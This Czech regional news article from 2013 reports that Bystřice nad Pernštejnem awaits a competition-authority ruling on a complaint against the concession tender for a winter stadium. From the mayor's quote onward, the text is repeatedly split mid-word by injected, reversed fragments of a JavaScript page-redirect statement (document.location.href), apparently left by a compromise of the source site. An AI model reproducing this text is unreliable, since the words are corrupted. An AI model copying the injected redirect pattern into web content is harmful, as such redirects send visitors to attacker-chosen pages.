Bystřice nad Pernštejnem, aktuality, zimní stadion,
Rainbow page separator

Bystřičtí čekají na rozhodnutí o zimním stadionu

Pátek, 2. srpna 2013

bnp-urad-300x225Bystřice nad Pernštejnem / Nejpozději během příštího týdne by měl k zástupcům bystřické radnice dorazit verdikt Úřadu pro ochranu hospodářské soutěže související se stížností jednoho z tamních obyvatel. Ten napadl koncesní řízení na výstavbu zimního stadionu.

„Stále doufáme, že [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dobře dopadne a výstavbě stadionu už nic nebude bránit. Vysvětlili jsme celý postup ohledně koncesního řízení a jsme [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho názoru, že všechno proběhlo v souladu se všemi zákonnými normami,“ uvedl bystřický mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Vojta.

I pokud ale bude úřadem vydán pro měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kladný posudek, stadion by se už stejně do konce roku, jak Bystřičtí původně plánovali, postavit nestihl.

Firma H+H Technika měla zimní stadion v lokalitě Lužánky vybudovat za zhruba 56 milionů korun. Zařízení by postavila a zaplatila, přičemž měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to by jí ho pak osm let splácelo. Po kolaudaci by se z inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora stal nájemce, jenž by kry[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou halu s ledovou plochou, hledištěm pro 250 diváků, zázemím a parkovištěm provozoval ve své režii po dobu patnácti let.